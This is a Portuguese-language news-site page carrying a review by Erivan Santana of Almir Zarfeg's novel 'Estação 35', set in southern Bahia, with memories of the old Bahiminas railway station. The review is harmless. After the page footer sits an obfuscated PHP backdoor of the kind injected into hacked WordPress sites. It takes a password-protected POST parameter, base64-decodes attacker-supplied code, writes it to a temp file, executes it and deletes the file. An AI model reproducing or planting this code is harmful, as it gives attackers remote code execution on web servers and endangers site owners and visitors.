• SEJA BEM-VINDO

“Estação 35” – de Almir Zarfeg – é uma viagem através de presente e passado

Publicado em: 25/01/2022 Atualizado:: janeiro 25, 2022

 

Por Erivan Santana

 

É com grata satisfação que acabo de ler o romance “Estação 35”, do escritor, poeta e jornalista Almir Zarfeg. O fato de termos uma história de tal porte ambientada em nossa região nos coloca na posição de privilegiados. E à medida que vamos lendo a obra, temos a sensação de estar junto aos personagens, pois, de uma forma ou de outra, conhecemos as cidades onde o enredo se desenvolve.

 

Eu, por exemplo, morei durante muito tempo em Posto da Mata (distrito do município de Nova Viçosa), onde meu pai era comerciante e onde passei boa parte da minha infância. Ali tinha uma estação desativada da EFBM que funcionava como agência dos Correios e eu sempre tinha muita curiosidade para saber mais sobre essa parte da nossa história. Aquela construção simbólica sempre significou muito para mim; graças a ela, nostalgia e mistérios se misturavam na minha imaginação.

 

 

Ao ler “Estação 35”, fui levado a conhecer cada vez mais sobre aspectos históricos, geográficos e culturais que o autor nos presenteia em uma trama carregada de significados, suspense e humor.

 

Tudo isso nos remete, necessariamente, a muito conhecimento e reflexão. E também suscita em nós, de certa maneira, um sentimento de pertencimento a esta região que muitas vezes ficava adormecido.

 

É bom viajar – via literatura – por uma região entrecortada de mares, rios, florestas, índios, afrodescendentes, cultura e muita história. O romance zarfeguiano, portanto, surge para nos lembrar de tantas coisas valiosas, como a estrada de ferro Bahiminas, que ligou o Extremo Sul da Bahia ao Nordeste de Minas Gerais. Ou como a Maria Fumaça, que transportou gente, riqueza e emoção durante décadas.

 

Parabéns, Almir Zarfeg, pela estreia na narrativa de fôlego! Que este romance seja o primeiro de muitos outros!

 

 

Erivan Santana é poeta e cronista. É autor de “Para ler um poema”, dentre outras obras. Ocupa a Cadeira 36 da Academia Teixeirense de Letras (ATL).


JORNAL INDEPENDENTE


Siga as redes sociais

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}